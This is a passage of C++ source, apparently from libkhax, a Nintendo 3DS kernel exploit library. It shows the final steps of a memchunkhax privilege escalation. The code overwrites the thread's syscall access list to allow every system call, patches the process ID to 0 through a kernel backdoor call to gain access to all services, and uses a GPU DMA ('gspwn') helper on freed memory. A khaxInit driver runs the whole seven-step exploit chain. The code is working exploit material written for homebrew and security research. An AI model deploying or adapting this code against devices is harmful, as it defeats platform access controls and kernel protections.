Result KHAX::MemChunkHax::Step6e_GrantSVCAccess()
|
|
{
|
|
// Everything, except nonexistent services 00, 7E or 7F.
|
|
static constexpr const char s_fullAccessACL[] = "\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x3F";
|
|
|
|
// Get the KThread pointer. Its type doesn't vary, so far.
|
|
KThread *kthread = *m_versionData->m_currentKThreadPtr;
|
|
|
|
// Debug dumping.
|
|
#ifdef KHAX_DEBUG_DUMP_DATA
|
|
// Get the KProcess pointer, whose type varies by kernel version.
|
|
void *kprocess = *m_versionData->m_currentKProcessPtr;
|
|
|
|
void *svcData = reinterpret_cast<void *>(reinterpret_cast<std::uintptr_t>(kthread->m_svcRegisterState) & ~std::uintptr_t(0xFF));
|
|
std::memcpy(m_savedKProcess, kprocess, sizeof(m_savedKProcess));
|
|
std::memcpy(m_savedKThread, kthread, sizeof(m_savedKThread));
|
|
std::memcpy(m_savedThreadSVC, svcData, sizeof(m_savedThreadSVC));
|
|
#endif
|
|
|
|
// Get a pointer to the SVC ACL within the SVC area for the thread.
|
|
SVCThreadArea *svcThreadArea = ContainingRecord<SVCThreadArea>(kthread->m_svcRegisterState, &SVCThreadArea::m_svcRegisterState);
|
|
KSVCACL &threadACL = svcThreadArea->m_svcAccessControl;
|
|
|
|
// Save the old one for diagnostic purposes.
|
|
std::memcpy(m_oldACL, threadACL, sizeof(threadACL));
|
|
|
|
// Set the ACL for the current thread.
|
|
std::memcpy(threadACL, s_fullAccessACL, sizeof(threadACL));
|
|
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Grant access to all services.
|
|
Result KHAX::MemChunkHax::Step7_GrantServiceAccess()
|
|
{
|
|
// Backup the original PID.
|
|
Result result = svcGetProcessId(&m_originalPID, m_versionData->m_currentKProcessHandle);
|
|
if (result != 0)
|
|
{
|
|
KHAX_printf("Step7:GetPID1 fail:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
KHAX_printf("Step7:current pid=%lu\n", m_originalPID);
|
|
|
|
// Patch the PID to 0, granting access to all services.
|
|
svcBackdoor(Step7a_PatchPID);
|
|
|
|
// Check whether PID patching succeeded.
|
|
u32 newPID;
|
|
result = svcGetProcessId(&newPID, m_versionData->m_currentKProcessHandle);
|
|
if (result != 0)
|
|
{
|
|
// Attempt patching back anyway, for stability reasons.
|
|
svcBackdoor(Step7b_UnpatchPID);
|
|
KHAX_printf("Step7:GetPID2 fail:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
if (newPID != 0)
|
|
{
|
|
KHAX_printf("Step7:nonzero:%lu\n", newPID);
|
|
return MakeError(27, 11, KHAX_MODULE, 1023);
|
|
}
|
|
|
|
// Reinit ctrulib's srv connection to gain access to all services.
|
|
srvExit();
|
|
srvInit();
|
|
|
|
// Restore the original PID now that srv has been tricked into thinking that we're PID 0.
|
|
svcBackdoor(Step7b_UnpatchPID);
|
|
|
|
// Check whether PID restoring succeeded.
|
|
result = svcGetProcessId(&newPID, m_versionData->m_currentKProcessHandle);
|
|
if (result != 0)
|
|
{
|
|
KHAX_printf("Step7:GetPID3 fail:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
if (newPID != m_originalPID)
|
|
{
|
|
KHAX_printf("Step7:not same:%lu\n", newPID);
|
|
return MakeError(27, 11, KHAX_MODULE, 1023);
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Patch the PID to 0.
|
|
Result KHAX::MemChunkHax::Step7a_PatchPID()
|
|
{
|
|
// Disable interrupts ASAP.
|
|
// FIXME: Need a better solution for this.
|
|
__asm__ volatile("cpsid aif");
|
|
|
|
// Patch the PID to 0. The version data has a function pointer in m_makeKProcessPointers
|
|
// to translate the raw KProcess pointer into pointers into key fields, and we access the
|
|
// m_processID field from it.
|
|
*(s_instance->m_versionData->m_makeKProcessPointers(*s_instance->m_versionData->m_currentKProcessPtr)
|
|
.m_processID) = 0;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Restore the original PID.
|
|
Result KHAX::MemChunkHax::Step7b_UnpatchPID()
|
|
{
|
|
// Disable interrupts ASAP.
|
|
// FIXME: Need a better solution for this.
|
|
__asm__ volatile("cpsid aif");
|
|
|
|
// Patch the PID back to the original value.
|
|
*(s_instance->m_versionData->m_makeKProcessPointers(*s_instance->m_versionData->m_currentKProcessPtr)
|
|
.m_processID) = s_instance->m_originalPID;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Helper for dumping memory to SD card.
|
|
template <std::size_t S>
|
|
bool KHAX::MemChunkHax::DumpMemberToSDCard(const unsigned char(MemChunkHax::*member)[S], const char *filename) const
|
|
{
|
|
char formatted[32];
|
|
snprintf(formatted, KHAX_lengthof(formatted), filename,
|
|
static_cast<unsigned>(m_versionData->m_kernelVersion), m_versionData->m_new3DS ?
|
|
"New" : "Old");
|
|
|
|
bool result = true;
|
|
|
|
FILE *file = std::fopen(formatted, "wb");
|
|
if (file)
|
|
{
|
|
result = result && (std::fwrite(this->*member, 1, sizeof(this->*member), file) == 1);
|
|
std::fclose(file);
|
|
}
|
|
else
|
|
{
|
|
result = false;
|
|
}
|
|
|
|
return result;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Free memory and such.
|
|
KHAX::MemChunkHax::~MemChunkHax()
|
|
{
|
|
// Dump memory to SD card if that is enabled.
|
|
#ifdef KHAX_DEBUG_DUMP_DATA
|
|
if (m_nextStep > 6)
|
|
{
|
|
DumpMemberToSDCard(&MemChunkHax::m_savedKProcess, "KProcess-%08X-%s.bin");
|
|
DumpMemberToSDCard(&MemChunkHax::m_savedKThread, "KThread-%08X-%s.bin");
|
|
DumpMemberToSDCard(&MemChunkHax::m_savedThreadSVC, "ThreadSVC-%08X-%s.bin");
|
|
}
|
|
#endif
|
|
|
|
// If we're corrupted, we're dead.
|
|
if (m_corrupted > 0)
|
|
{
|
|
KHAX_printf("~:error while corrupt;freezing\n");
|
|
for (;;)
|
|
{
|
|
svcSleepThread(s64(60) * 1000000000);
|
|
}
|
|
}
|
|
|
|
// This function has to be careful not to crash trying to shut down after an aborted attempt.
|
|
if (m_overwriteMemory)
|
|
{
|
|
u32 dummy;
|
|
|
|
// Each page has a flag indicating that it is still allocated.
|
|
for (unsigned x = 0; x < KHAX_lengthof(m_overwriteMemory->m_pages); ++x)
|
|
{
|
|
// Don't free a page unless it remains allocated.
|
|
if (m_overwriteAllocated & (1u << x))
|
|
{
|
|
Result res = svcControlMemory(&dummy, reinterpret_cast<u32>(&m_overwriteMemory->m_pages[x]), 0,
|
|
sizeof(m_overwriteMemory->m_pages[x]), MEMOP_FREE, static_cast<MemPerm>(0));
|
|
KHAX_printf("free %u: %08lx\n", x, res);
|
|
KHAX_UNUSED(res);
|
|
}
|
|
}
|
|
}
|
|
|
|
// Free the extra linear memory.
|
|
if (m_extraLinear)
|
|
{
|
|
linearFree(m_extraLinear);
|
|
}
|
|
|
|
// s_instance better be us
|
|
if (s_instance != this)
|
|
{
|
|
KHAX_printf("~:s_instance is wrong\n");
|
|
}
|
|
else
|
|
{
|
|
s_instance = nullptr;
|
|
}
|
|
}
|
|
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
//
|
|
// Miscellaneous
|
|
//
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Make an error code
|
|
inline Result KHAX::MakeError(Result level, Result summary, Result module, Result error)
|
|
{
|
|
return (level << 27) + (summary << 21) + (module << 10) + error;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Check whether this system is a New 3DS.
|
|
Result KHAX::IsNew3DS(bool *answer, u32 kernelVersionAlreadyKnown)
|
|
{
|
|
// If the kernel version isn't already known by the caller, find out.
|
|
u32 kernelVersion = kernelVersionAlreadyKnown;
|
|
if (kernelVersion == 0)
|
|
{
|
|
kernelVersion = osGetKernelVersion();
|
|
}
|
|
|
|
// APT_CheckNew3DS doesn't work on < 8.0.0, but neither do such New 3DS's exist.
|
|
if (kernelVersion >= SYSTEM_VERSION(2, 44, 6))
|
|
{
|
|
// Check whether the system is a New 3DS. If this fails, abort, because being wrong would
|
|
// crash the system.
|
|
u8 isNew3DS = 0;
|
|
if (Result error = APT_CheckNew3DS(&isNew3DS))
|
|
{
|
|
*answer = false;
|
|
return error;
|
|
}
|
|
|
|
// Use the result of APT_CheckNew3DS.
|
|
*answer = isNew3DS != 0;
|
|
return 0;
|
|
}
|
|
|
|
// Kernel is older than 8.0.0, so we logically conclude that this cannot be a New 3DS.
|
|
*answer = false;
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// gspwn, meant for reading from or writing to freed buffers.
|
|
Result KHAX::GSPwn(void *dest, const void *src, std::size_t size, bool wait)
|
|
{
|
|
// Copy that floppy.
|
|
if (Result result = GX_TextureCopy(static_cast<u32 *>(const_cast<void *>(src)), 0,
|
|
static_cast<u32 *>(dest), 0, size, 8))
|
|
{
|
|
KHAX_printf("gspwn:copy fail:%08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
// Wait for the operation to finish.
|
|
if (wait)
|
|
{
|
|
gspWaitForPPF();
|
|
}
|
|
|
|
return 0;
|
|
}
|
|
|
|
Result KHAX::userFlushDataCache(const void *p, std::size_t n)
|
|
{
|
|
return GSPGPU_FlushDataCache(p, n);
|
|
}
|
|
|
|
Result KHAX::userInvalidateDataCache(const void *p, std::size_t n)
|
|
{
|
|
return GSPGPU_InvalidateDataCache(p, n);
|
|
}
|
|
|
|
void KHAX::userFlushPrefetch()
|
|
{
|
|
__asm__ volatile ("mcr p15, 0, %0, c7, c5, 4\n" :: "r"(0));
|
|
}
|
|
|
|
void KHAX::userDsb()
|
|
{
|
|
__asm__ volatile ("mcr p15, 0, %0, c7, c10, 4\n" :: "r"(0));
|
|
}
|
|
|
|
void KHAX::userDmb()
|
|
{
|
|
__asm__ volatile ("mcr p15, 0, %0, c7, c10, 5\n" :: "r"(0));
|
|
}
|
|
|
|
void KHAX::kernelCleanDataCacheLineWithMva(const void *p)
|
|
{
|
|
__asm__ volatile ("mcr p15, 0, %0, c7, c10, 1\n" :: "r"(p));
|
|
}
|
|
|
|
void KHAX::kernelInvalidateInstructionCacheLineWithMva(const void *p)
|
|
{
|
|
__asm__ volatile ("mcr p15, 0, %0, c7, c5, 1\n" :: "r"(p));
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Given a pointer to a structure that is a member of another structure,
|
|
// return a pointer to the outer structure. Inspired by Windows macro.
|
|
template <typename Outer, typename Inner>
|
|
Outer *KHAX::ContainingRecord(Inner *member, Inner Outer::*field)
|
|
{
|
|
unsigned char *p = reinterpret_cast<unsigned char *>(member);
|
|
p -= reinterpret_cast<std::uintptr_t>(&(static_cast<Outer *>(nullptr)->*field));
|
|
return reinterpret_cast<Outer *>(p);
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Main initialization function interface.
|
|
extern "C" Result khaxInit()
|
|
{
|
|
using namespace KHAX;
|
|
|
|
#ifdef KHAX_DEBUG
|
|
bool isNew3DS;
|
|
IsNew3DS(&isNew3DS, 0);
|
|
KHAX_printf("khaxInit: k=%08lx f=%08lx n=%d\n", osGetKernelVersion(), osGetFirmVersion(),
|
|
isNew3DS);
|
|
#endif
|
|
|
|
// Look up the current system's version in our table.
|
|
const VersionData *versionData = VersionData::GetForCurrentSystem();
|
|
if (!versionData)
|
|
{
|
|
KHAX_printf("khaxInit: Unknown kernel version\n");
|
|
return MakeError(27, 6, KHAX_MODULE, 39);
|
|
}
|
|
|
|
KHAX_printf("verdat t=%08lx s=%08lx v=%08lx\n", versionData->m_threadPatchAddress,
|
|
versionData->m_syscallPatchAddress, versionData->m_fcramVirtualAddress);
|
|
|
|
// Create the hack object.
|
|
MemChunkHax hax{ versionData };
|
|
|
|
// Run through the steps.
|
|
if (Result result = hax.Step1_Initialize())
|
|
{
|
|
KHAX_printf("khaxInit: Step1 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step2_AllocateMemory())
|
|
{
|
|
KHAX_printf("khaxInit: Step2 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step3_SurroundFree())
|
|
{
|
|
KHAX_printf("khaxInit: Step3 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step4_VerifyExpectedLayout())
|
|
{
|
|
KHAX_printf("khaxInit: Step4 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step5_CorruptCreateThread())
|
|
{
|
|
KHAX_printf("khaxInit: Step5 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step6_ExecuteSVCCode())
|
|
{
|
|
KHAX_printf("khaxInit: Step6 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
if (Result result = hax.Step7_GrantServiceAccess())
|
|
{
|
|
KHAX_printf("khaxInit: Step7 failed: %08lx\n", result);
|
|
return result;
|
|
}
|
|
|
|
KHAX_printf("khaxInit: done\n");
|
|
return 0;
|
|
}
|
|
|
|
//------------------------------------------------------------------------------------------------
|
|
// Shut down libkhax. Doesn't actually do anything at the moment, since khaxInit does everything
|
|
// and frees all memory on the way out.
|
|
extern "C" Result khaxExit()
|
|
{
|
|
return 0;
|
|
}
|